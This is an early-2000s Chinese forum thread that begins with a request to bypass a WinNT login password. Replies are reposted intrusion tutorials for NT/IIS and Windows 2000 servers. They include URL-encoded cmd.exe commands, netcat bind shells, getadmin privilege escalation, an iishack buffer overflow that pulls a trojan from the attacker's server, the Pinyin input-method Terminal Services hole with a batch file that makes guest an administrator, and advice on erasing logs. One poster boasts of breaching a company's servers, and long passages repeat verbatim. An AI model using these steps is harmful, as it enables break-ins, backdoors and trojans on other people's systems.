W
wlmmlw
Unregistered / Unconfirmed
GUEST, unregistred user!
如何破解WinNT(中文和英文)的密码进入系统?
请列出详细步骤,如能成功,可获300分的报酬!!!!谢谢
请列出详细步骤,如能成功,可获300分的报酬!!!!谢谢
X
xf-wangyi
Unregistered / Unconfirmed
GUEST, unregistred user!
关注!2000可以用输入法漏洞进去,NT吗....
没用过!
没用过!
W
wlmmlw
Unregistered / Unconfirmed
GUEST, unregistred user!
如果分数不够可以在加!!!!!!!!
B
bluerain
Unregistered / Unconfirmed
GUEST, unregistred user!
获取NT的admin权限的方法 (MS,其他)
;
涉及程序:
NT server
;
描述:
一般用户获取NT服务器Admin权限的方法(一)
;
详细:
获取NT的admin权限的方法:
一、通过修改注册表
凡是具有登录NT本机的用户,例如IUSR_machine,都具有对 HKEY_LOCAL_MACHINE/SOFTWARE/MICROSOFT/WINDOWS/CurrentVersion/Run 项的可读可写权限,该用户可以远程访问这个项。比如,他可以创建一个bat文件,文件内容为: cmd.exe /c net localgroup administrators
IUSR_machine /add,把该文件copy到winnt目录下,然后在注册表上述的项添加一个数值,指向这个文件。
那么,当下次Admin登录到该机器上时,就会自动把IUSR_machine添加到Administrators组。
另,注册表键HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/User Shell Folders/Common Startup 也可以这么做。
二、自建telnet服务在NT上执行指令
要求用户有文件上传权限,而且该目录位于web目录下,该目录允许执行
下面是具体步骤
假设你的目录是www.xxx.com/frankie
那么,把cmd.exe(位于C:/winnt/system32/cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去,
然后,在浏览器端输入:
http://www.xxx.com/frankie/cmd.exe?/c%20nc.exe%20-l%20-p%2023%20-t%20-e%20cmd.exe
这时候,你的浏览器将停止不动,实际上,server上的Telnet的服务已经产生了:
这时,用Telnet连接www.xxx.com的23端口,你发现,不用密码,不用登陆,对方C:/提示符已经出现在你的眼前!更妙的是,这个Telnet server是一个一次性的服务,当客户端一退出,该服务也将终止.
Netcat不同于一般的特洛伊木马,它可以构建任何的TCP连接服务.在浏览器端输入上述的字符串,等价于在NT的Dos方式下输入: nc -l -p 23 -t
-e cmd.exe 这将把cmd.exe绑定到23端口上
三、入侵NTserver典型途径V2.0
简介
1、如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得root
2、用netcat和iishack可以获得root
3、iusr_计算机名这个帐号有ftp上传,web执行等权限.
4、在web server上执行程序是入侵NT的关键
5、要在web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去
在本文中,目标机器的名称是ntsvr2,目标机器的域名是www.xxx.com,目标机器上有scripts和cgi-bin目录,scripts目录下有uploadn.asp等asp
程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号:
第一个方法,用iusr_ntsvr2后者guest这两个帐号,这里假设我们已经破解了这个帐号的密码:
在浏览器输入:
http://www.xxx.com/scripts/uploadn.asp
guest和iusr_ntsvr2这两个帐号都可以进这个asp页面
在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录.
然后输入:http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2
大约十多秒后屏幕显示:
CGI Error
这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:/winnt/system32/net.exe%20user%20china%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/scripts/getadmin.exe?china
第二个方法,用匿名ftp:
如果允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).
ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSR_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来
获取Administrator的权限
User (www.xxx.com
none)):anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 输入 guest@ 或者guest
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然
只属于Domain guest组
在这种情况下我们就可以进NT server的ftp了。
进去以后,看看目录列表,试试 cd /scripts 或cgi-bin等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。
把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin
然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2
大约十多秒后屏幕显示:
CGI Error
这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:/winnt/system32/net.exe%20user%20china%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/cgi-bin/getadmin.exe?china
或者
http://www.xxx.com/scripts/tools/getadmin.exe?china
你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改 如果没有cmd.exe,也可以自己传一个上去到
scripts/tools或者cgi-bin目录
第三个方法,用netcat和iishack
如果你熟悉使用Netcat这个工具,你就知道,netcat可以利用NT的弱点在其上绑定端口,下面用eEye的工具已经介绍过,如果你熟悉Netcat,成功的可能性会更大:
IIS的ISAPI的毛病(*.HTR) 我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具.在IIS的/Inetsrv目录下,有个DLL文件叫
ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现
IIShack.asm ,利用这个毛病,eEye写了两个程序:
iishack.exe
ncx99.exe,为达目的你必须自己有一个web server,把ncx99.exe和
netbus木马传到这个web server的目录下,比如你的web server是:
www.mysvr.com? 而对方的IIS server是www.xxx.com
则: iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意,不要加http://字符!)
上述命令输入后这时你应该可以看到
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com
[usage: iishack <host> <port> <url> ]
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------
Data sent!
然后,再把Netbus等特洛伊木马传到对方机器上去:
iishack www.example.com 80 www.myserver.com/netbus.exe
ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务
ncx.exe 这是较早的版本,是把端口绑到80的,由于80端口跑web服
务,端口已经被使用.所以可能不一定有效
然后,用Telnet到对方的99或80端口:
Telnet www.xxx.com 99
结果是这样:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:/>[You have full access to the system, happy browsing]
C:/>[Add a scheduled task to restart inetinfo in X minutes]
C:/>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:/>[Clean up any trace or logs we might have left behind.]
这样,你就完全控制了其硬盘上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出
参考资料: eeye.zip
补救方法:在IIS的www service属性中将主目录的应用程序设置的*.htr的映射删除
微软对这个问题的正式回应
其它:用Retina.exe得到NT域内的帐号清单,逐个尝试这些帐号,如果有的密码薄弱而被你猜出来,就可以用上面的方法来获取NT的admin
不明白的地方请看黑客世界最新更新的有关NT的系列文章
版权属于CCSDT&Frankie所有
;
解决方案:
控制一般用户对注册表Run项的可写权限
打最新的Services Pack
;
涉及程序:
NT server
;
描述:
一般用户获取NT服务器Admin权限的方法(一)
;
详细:
获取NT的admin权限的方法:
一、通过修改注册表
凡是具有登录NT本机的用户,例如IUSR_machine,都具有对 HKEY_LOCAL_MACHINE/SOFTWARE/MICROSOFT/WINDOWS/CurrentVersion/Run 项的可读可写权限,该用户可以远程访问这个项。比如,他可以创建一个bat文件,文件内容为: cmd.exe /c net localgroup administrators
IUSR_machine /add,把该文件copy到winnt目录下,然后在注册表上述的项添加一个数值,指向这个文件。
那么,当下次Admin登录到该机器上时,就会自动把IUSR_machine添加到Administrators组。
另,注册表键HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/User Shell Folders/Common Startup 也可以这么做。
二、自建telnet服务在NT上执行指令
要求用户有文件上传权限,而且该目录位于web目录下,该目录允许执行
下面是具体步骤
假设你的目录是www.xxx.com/frankie
那么,把cmd.exe(位于C:/winnt/system32/cmd.exe)和Netcat里面包含的nc.exe传到这个目录上去,
然后,在浏览器端输入:
http://www.xxx.com/frankie/cmd.exe?/c%20nc.exe%20-l%20-p%2023%20-t%20-e%20cmd.exe
这时候,你的浏览器将停止不动,实际上,server上的Telnet的服务已经产生了:
这时,用Telnet连接www.xxx.com的23端口,你发现,不用密码,不用登陆,对方C:/提示符已经出现在你的眼前!更妙的是,这个Telnet server是一个一次性的服务,当客户端一退出,该服务也将终止.
Netcat不同于一般的特洛伊木马,它可以构建任何的TCP连接服务.在浏览器端输入上述的字符串,等价于在NT的Dos方式下输入: nc -l -p 23 -t
-e cmd.exe 这将把cmd.exe绑定到23端口上
三、入侵NTserver典型途径V2.0
简介
1、如果你有NT/IIS服务器的任何一个帐号,哪怕是guest帐号,都可以获得root
2、用netcat和iishack可以获得root
3、iusr_计算机名这个帐号有ftp上传,web执行等权限.
4、在web server上执行程序是入侵NT的关键
5、要在web server上执行程序就先要上传文件到cgi-bin目录或者scripts目录等有执行权限的目录上去
在本文中,目标机器的名称是ntsvr2,目标机器的域名是www.xxx.com,目标机器上有scripts和cgi-bin目录,scripts目录下有uploadn.asp等asp
程序,可能有guest帐号,肯定有iusr_ntsvr2这个帐号:
第一个方法,用iusr_ntsvr2后者guest这两个帐号,这里假设我们已经破解了这个帐号的密码:
在浏览器输入:
http://www.xxx.com/scripts/uploadn.asp
guest和iusr_ntsvr2这两个帐号都可以进这个asp页面
在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录.
然后输入:http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2
大约十多秒后屏幕显示:
CGI Error
这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:/winnt/system32/net.exe%20user%20china%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/scripts/getadmin.exe?china
第二个方法,用匿名ftp:
如果允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).
ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSR_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来
获取Administrator的权限
User (www.xxx.com
none)):anonymous331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 输入 guest@ 或者guest
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然
只属于Domain guest组
在这种情况下我们就可以进NT server的ftp了。
进去以后,看看目录列表,试试 cd /scripts 或cgi-bin等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。
把winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin
然后输入:http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2
大约十多秒后屏幕显示:
CGI Error
这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:/winnt/system32/net.exe%20user%20china%20news%20/add
这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/cgi-bin/getadmin.exe?china
或者
http://www.xxx.com/scripts/tools/getadmin.exe?china
你再用china的帐号登陆,就可以有最大的权限了,也可以用上面的cmd.exe的方法直接修改 如果没有cmd.exe,也可以自己传一个上去到
scripts/tools或者cgi-bin目录
第三个方法,用netcat和iishack
如果你熟悉使用Netcat这个工具,你就知道,netcat可以利用NT的弱点在其上绑定端口,下面用eEye的工具已经介绍过,如果你熟悉Netcat,成功的可能性会更大:
IIS的ISAPI的毛病(*.HTR) 我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具.在IIS的/Inetsrv目录下,有个DLL文件叫
ism.dll,这个模块在web运行的时候就被加载到较高的内存地址,并且导致了零字节问题到处出现
IIShack.asm ,利用这个毛病,eEye写了两个程序:
iishack.exe
ncx99.exe,为达目的你必须自己有一个web server,把ncx99.exe和
netbus木马传到这个web server的目录下,比如你的web server是:
www.mysvr.com? 而对方的IIS server是www.xxx.com
则: iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意,不要加http://字符!)
上述命令输入后这时你应该可以看到
------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com
[usage: iishack <host> <port> <url> ]
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------
Data sent!
然后,再把Netbus等特洛伊木马传到对方机器上去:
iishack www.example.com 80 www.myserver.com/netbus.exe
ncx99.exe实际上是有名的Netcat的变种,它把对方server的cmd.exe绑定到Telnet服务
ncx.exe 这是较早的版本,是把端口绑到80的,由于80端口跑web服
务,端口已经被使用.所以可能不一定有效
然后,用Telnet到对方的99或80端口:
Telnet www.xxx.com 99
结果是这样:
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:/>[You have full access to the system, happy browsing
]C:/>[Add a scheduled task to restart inetinfo in X minutes]
C:/>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:/>[Clean up any trace or logs we might have left behind.]
这样,你就完全控制了其硬盘上的文件!注意,如果你type exit退出,对方server上的这个进程也会退出
参考资料: eeye.zip
补救方法:在IIS的www service属性中将主目录的应用程序设置的*.htr的映射删除
微软对这个问题的正式回应
其它:用Retina.exe得到NT域内的帐号清单,逐个尝试这些帐号,如果有的密码薄弱而被你猜出来,就可以用上面的方法来获取NT的admin
不明白的地方请看黑客世界最新更新的有关NT的系列文章
版权属于CCSDT&Frankie所有
;
解决方案:
控制一般用户对注册表Run项的可写权限
打最新的Services Pack
D
drummer
Unregistered / Unconfirmed
GUEST, unregistred user!
没细看,很怕怕哟
nt这么不经搞吗?
收藏先
nt这么不经搞吗?
收藏先
W
wangfu
Unregistered / Unconfirmed
GUEST, unregistred user!
http://www.cnhonker.net/
F
failam
Unregistered / Unconfirmed
GUEST, unregistred user!
有那么容易,比尔不就买菜去了吗!
W
wlmmlw
Unregistered / Unconfirmed
GUEST, unregistred user!
是我自己的机子,忘记了开机的密码,请帮手!!!!!如能解决,在加200分!!!!
B
bluerain
Unregistered / Unconfirmed
GUEST, unregistred user!
你难道把guest登录也给封掉了?那很惨哦[]
实在没办法,就只好另装一个系统,导一下文件了。[
]
]实在没办法,就只好另装一个系统,导一下文件了。[
]
W
wlmmlw
Unregistered / Unconfirmed
GUEST, unregistred user!
这么惨,我可玩完了!!!!!
Z
zhangkan
Unregistered / Unconfirmed
GUEST, unregistred user!
找到三个相关的,但最后发现有一个是bluerain已贴了的,就只贴两个上来了,那个输入法的
要你的Win2k没有打补丁,不然也没戏.另外,我觉得你的guest用户应该没有删除掉吧?只要
你还能进win2k就还有戏,还有,如果你的机器是在局域网内,那么你用其它用户的用户和密码
也能登录进去的.要是都没有,你可以另外一个硬盘装好了win2000,还是可以将你的文件找
回来的,只是比较麻烦.Good Luck!
1.
如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:
先把c:winntsystem32下的logon.scr改名为logon.old备份
然后把usrmgr.exe改名为logon.scr
然后重新启动
logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界
面,而是用户管理器
这时他就有权限把自己加到Administrator组
不要忘记把文件名改回来啊!
2.
由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼(^^我只在全拼下成功)的w2k 服务器存在着远程登陆并能获取超级用户权限的严重漏洞。
小女子几经周折、胆战心惊 、多次尝试 ,终于明白个中道理,不需上传任何文件成功入侵并装个后门(现在流行走后门^^)。
其过程如下:
1.扫描 3389 port 终端服务默认;
2.用终端客户端程序进行连接;
3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
4.在"选项"菜单上点右键--->跳转到URL",输入:c:/winnt/system32/cmd.exe.(如果不能确定NT系统目录,则输入:c:/ 或d:/ ……进行查找确定);
5.选择"保存到磁盘" 选择目录:c:/inetpub/scripts/,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;
6.打开IE,输入:http://ip/scripts/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?这我们就完成了第一步;
7.http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8.http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9.http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10.http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"选项"菜单上点右键--->跳转到URL",输入:c:/inetpub/scripts/go.bat --->在磁盘当前位置执行;
12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢! (我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:)
注意事项:
1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你!
2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙,小女子为此不知浪费了多少的网费和精力。
3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!小女子可就这样吃亏过一次,上传木马中断没有完成,第二天,人家已打上补丁,再也无法进入!并且还留下了xxxx……:(
个人观点:
1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等;
2.url的跳转下,你将拥有超级用户的权限,好好利用吧:)
3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次吧!:)
4.此法似乎与对方的防火墙无关哦!
堵漏办法:
1.打补丁;
2.删掉全拼输入法,用标准就成了嘛^^;
3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32/termsrv.exe;(如果哪天你潜入服务器,发现了termsrv.exe文件,而又没探测到3389端口,你知道该怎样做了吧?^^)
问题(高手请赐教):
1.如果IE下的www访问需要密码,怎办?
2.如果对方不开www服务怎办?我试过了直接跳转url:net user hack elise /add命令,不能成功!
3.如果对方139 port不开,有什么办法打开吗?W2k server中怎样控制139端口?
88了,小女子要走了,衷心希望各位高手、Cool GG不要对小女子保守哦,没人帮助的自学好艰苦!:((
Homepage;elise.51.net mailto:forelise@263.net QQ:[7175215]
[被 elise 编辑过(日期 02-06-2001)]
——————————
我黑故我在……
------------------------------------------------------------------------------------
在ELISE的帖子中有一段:
1.跳至url:/winnt/system32 (系统目录在跳至url上已显示出来啦!!)
2.选中net.exe文件,点右键--->创建快键方式--->在快捷方式下点右键--->快捷方式的目标后加入:user guest /active:yes ,其他的不用再说了吧:)
我试了一下发现很多服务器都没有把GUEST加入到ADMIN组~而当你激活了GUEST后还是无法访问对方电脑的,俺补充一点点确保新手可以成功~
net user guest /active:yes 激活GUEST用户net user guest 123 为GUEST重新设置密码:123
net localgroup administrators guest /add
将GUEST加入ADMINISTRATOR组~
但为了避免服务器被坏人利用请进入后通知管理人员,或者禁止GUEST,把密码加难。
/SYSTEM32/LOGFILES/*.EVT
--------------------------------------------------------------------------------
现在把本人的方法写出来和大家分享。
其实只要把上面提到的BAT文件,用FTP发送到一个主页上(我的主页上就有一个,下载的地址是“http://go2.163.com/~tomylee/hack/tomy.bat/”)。然后用WIN2K登陆——换到全拼状态——右键——帮助——输入法入门——在选项菜单上点右键——跳转到URL——然后就是把http://go2.163.com/~tomylee/hack/tomy.bat/写到URL里面,接下来会出现下载的提示框,先“在当前位置打开该程序”,然后?呵呵,便是击活“GUEST”用户。下一步是什么?
都是国内的机子,希望大家不要太滥用。小心点,太狠对谁都没有好处的。:)
文章完了。希望大家给个意见:) http://tomychen.my163.com
大家要是有空的话,到我那去坐坐:)
;
好象还有更方便的方法,不过不是我想出来的!!现在说一下和大家分享!!
在跳
至url中输入:c:/winnt/system32,然后找到net.exe,右键点击net.exe,选择创建快捷方式,于是创建了
一个文件名为快捷方式net.lnk的文件,然后再右键点击这个快捷方式,选择属性,这时我们就可以输入我们
的命令了。在目标中添入我们要执行的命令的路径和参数就行了,我们还是用net命令,因此不必改路径了,
添加个账号test的命令如下,C:/WINNT/system32/net.exe user test/add。密码为空。然后双击这个快捷方
式运行它。然后我们把这个账号添加到administrators组中(同样是上述方法),
执行C:/WINNT/system32/net.exe localgroup administrators test/add。OK!再运行。我们现在已经基本上成功了,
关掉帮助窗口,用test账号登陆,密码为空。进去后我们把刚才建的快捷方式删掉。然后再将本地用户的
Tsinternetuser账号加进administrators组中,设置密码。这样我们下次就可以用这个账号进来了。然后
再用这个账号登陆一下,如果能够登陆,就删掉刚刚建立的test账号。
这台机器就这样控制在我们的手里了。。。。。。
要你的Win2k没有打补丁,不然也没戏.另外,我觉得你的guest用户应该没有删除掉吧?只要
你还能进win2k就还有戏,还有,如果你的机器是在局域网内,那么你用其它用户的用户和密码
也能登录进去的.要是都没有,你可以另外一个硬盘装好了win2000,还是可以将你的文件找
回来的,只是比较麻烦.Good Luck!
1.
如果你有普通用户帐号,有个一个很简单的方法获取NT Administrator帐号:
先把c:winntsystem32下的logon.scr改名为logon.old备份
然后把usrmgr.exe改名为logon.scr
然后重新启动
logon.scr是启动时加载的程序,重新启动后,不会出现以往的登陆密码输入界
面,而是用户管理器
这时他就有权限把自己加到Administrator组
不要忘记把文件名改回来啊!
2.
由于微软对中国产品不付责任的态度,使得安装了终端服务和全拼(^^我只在全拼下成功)的w2k 服务器存在着远程登陆并能获取超级用户权限的严重漏洞。
小女子几经周折、胆战心惊 、多次尝试 ,终于明白个中道理,不需上传任何文件成功入侵并装个后门(现在流行走后门^^)。
其过程如下:
1.扫描 3389 port 终端服务默认;
2.用终端客户端程序进行连接;
3.按ctrl+shift调出全拼输入法(其他似乎不行),点鼠标右键(如果其帮助菜单发灰,就赶快赶下家吧,人家打补丁了),点帮助,点输入法入门;
4.在"选项"菜单上点右键--->跳转到URL",输入:c:/winnt/system32/cmd.exe.(如果不能确定NT系统目录,则输入:c:/ 或d:/ ……进行查找确定);
5.选择"保存到磁盘" 选择目录:c:/inetpub/scripts/,因实际上是对方服务器上文件自身的复制操作,所以这个过程很快就会完成;
6.打开IE,输入:http://ip/scripts/cmd.exe?/c dir 怎么样?有cmd.exe文件了吧?这我们就完成了第一步;
7.http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8.http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9.http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10.http://ip/scripts/cmd.exe?/c type go.bat 看看我们的批文件内容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"选项"菜单上点右键--->跳转到URL",输入:c:/inetpub/scripts/go.bat --->在磁盘当前位置执行;
12.呵呵,大功告成啦,这样我们就激活了服务器的geust帐户,密码为:elise,超级用户呢! (我喜欢guest而不是建立新帐户,这样似乎不易被发现些),这样你就可用IPC$连接,想怎样做就怎样做了,当然,你也可用guest直接登陆到他的服务器,到他机器上去跳舞吧:)
注意事项:
1.当你用终端客户端程序登陆到他的服务器时,你的所有操作不会在他的机器上反应出来,但如果他正打开了终端服务管理器,你就惨了了:(这时他能看到你所打开的进程id、程序映象,你的ip及机器名,并能发消息给你!
2.当你连接时,会加重对方服务器的负荷,非常容易造成对方死机和断线,所以你的操作快点为妙,小女子为此不知浪费了多少的网费和精力。
3.尽快做好后门,暂时不要上传任何程序,一是防止断线,二是防止对方打上补丁!小女子可就这样吃亏过一次,上传木马中断没有完成,第二天,人家已打上补丁,再也无法进入!并且还留下了xxxx……:(
个人观点:
1.在IE下,所拥有的只是iusr_machine权限,因而,你不要设想去做越权的事情,如启动telnet、木马等;
2.url的跳转下,你将拥有超级用户的权限,好好利用吧:)
3.跳转到哪个目录下,通常只能查看、执行当前目录的文件,不能进入到子目录,如想进入,再跳一次吧!:)
4.此法似乎与对方的防火墙无关哦!
堵漏办法:
1.打补丁;
2.删掉全拼输入法,用标准就成了嘛^^;
3.服务中关掉:Terminal Services,服务名称:TermService,对应程序名:system32/termsrv.exe;(如果哪天你潜入服务器,发现了termsrv.exe文件,而又没探测到3389端口,你知道该怎样做了吧?^^)
问题(高手请赐教):
1.如果IE下的www访问需要密码,怎办?
2.如果对方不开www服务怎办?我试过了直接跳转url:net user hack elise /add命令,不能成功!
3.如果对方139 port不开,有什么办法打开吗?W2k server中怎样控制139端口?
88了,小女子要走了,衷心希望各位高手、Cool GG不要对小女子保守哦,没人帮助的自学好艰苦!:((
Homepage;elise.51.net mailto:forelise@263.net QQ:[7175215]
[被 elise 编辑过(日期 02-06-2001)]
——————————
我黑故我在……
------------------------------------------------------------------------------------
在ELISE的帖子中有一段:
1.跳至url:/winnt/system32 (系统目录在跳至url上已显示出来啦!!)
2.选中net.exe文件,点右键--->创建快键方式--->在快捷方式下点右键--->快捷方式的目标后加入:user guest /active:yes ,其他的不用再说了吧:)
我试了一下发现很多服务器都没有把GUEST加入到ADMIN组~而当你激活了GUEST后还是无法访问对方电脑的,俺补充一点点确保新手可以成功~
net user guest /active:yes 激活GUEST用户net user guest 123 为GUEST重新设置密码:123
net localgroup administrators guest /add
将GUEST加入ADMINISTRATOR组~
但为了避免服务器被坏人利用请进入后通知管理人员,或者禁止GUEST,把密码加难。
/SYSTEM32/LOGFILES/*.EVT
--------------------------------------------------------------------------------
现在把本人的方法写出来和大家分享。
其实只要把上面提到的BAT文件,用FTP发送到一个主页上(我的主页上就有一个,下载的地址是“http://go2.163.com/~tomylee/hack/tomy.bat/”)。然后用WIN2K登陆——换到全拼状态——右键——帮助——输入法入门——在选项菜单上点右键——跳转到URL——然后就是把http://go2.163.com/~tomylee/hack/tomy.bat/写到URL里面,接下来会出现下载的提示框,先“在当前位置打开该程序”,然后?呵呵,便是击活“GUEST”用户。下一步是什么?
都是国内的机子,希望大家不要太滥用。小心点,太狠对谁都没有好处的。:)
文章完了。希望大家给个意见:) http://tomychen.my163.com
大家要是有空的话,到我那去坐坐:)
;
好象还有更方便的方法,不过不是我想出来的!!现在说一下和大家分享!!
在跳
至url中输入:c:/winnt/system32,然后找到net.exe,右键点击net.exe,选择创建快捷方式,于是创建了
一个文件名为快捷方式net.lnk的文件,然后再右键点击这个快捷方式,选择属性,这时我们就可以输入我们
的命令了。在目标中添入我们要执行的命令的路径和参数就行了,我们还是用net命令,因此不必改路径了,
添加个账号test的命令如下,C:/WINNT/system32/net.exe user test/add。密码为空。然后双击这个快捷方
式运行它。然后我们把这个账号添加到administrators组中(同样是上述方法),
执行C:/WINNT/system32/net.exe localgroup administrators test/add。OK!再运行。我们现在已经基本上成功了,
关掉帮助窗口,用test账号登陆,密码为空。进去后我们把刚才建的快捷方式删掉。然后再将本地用户的
Tsinternetuser账号加进administrators组中,设置密码。这样我们下次就可以用这个账号进来了。然后
再用这个账号登陆一下,如果能够登陆,就删掉刚刚建立的test账号。
这台机器就这样控制在我们的手里了。。。。。。
L
lsj
Unregistered / Unconfirmed
GUEST, unregistred user!
我这有个很厉害的软件,NT4.0/2000有效,可放进一张软盘,用他启动机器,回答几个问题,
就可以重写Administrator密码,不是破解,是重写。到时想干什么都行了
就可以重写Administrator密码,不是破解,是重写。到时想干什么都行了
W
wlmmlw
Unregistered / Unconfirmed
GUEST, unregistred user!
可以送给我吗? wunoman@163.net
L
lsj
Unregistered / Unconfirmed
GUEST, unregistred user!
让我找找先,找到发给你
W
wlmmlw
Unregistered / Unconfirmed
GUEST, unregistred user!
请快点,我急着用!!!!!
A
asir
Unregistered / Unconfirmed
GUEST, unregistred user!
嘻嘻,我也做个那种盘的,不过给删除了----那个很容易实现,也非常容易给封的,
不过,举我所知,很多的nt服务器都没有打布丁-----我曾用上边两个哥哥方法,进入过很多台
服务器,呵呵,其中有个还是一个比较有名气的企业站点,嘻嘻
哥哥 去黑白网络找个小东东,九可以了http://www.521hacker.com/heibai.html
不过,举我所知,很多的nt服务器都没有打布丁-----我曾用上边两个哥哥方法,进入过很多台
服务器,呵呵,其中有个还是一个比较有名气的企业站点,嘻嘻
哥哥 去黑白网络找个小东东,九可以了http://www.521hacker.com/heibai.html
L
lsj
Unregistered / Unconfirmed
GUEST, unregistred user!
已发送,请查收
W
wlmmlw
Unregistered / Unconfirmed
GUEST, unregistred user!
没有收到,如果有,请在2:30之前发给我!!!!
W
wlmmlw
Unregistered / Unconfirmed
GUEST, unregistred user!
收到,如何使用!!!!请马上告知!!!!!!
远
远帆
Unregistered / Unconfirmed
GUEST, unregistred user!
能给我也发一份吗?
yuan-fan@21cn.com
yuan-fan@21cn.com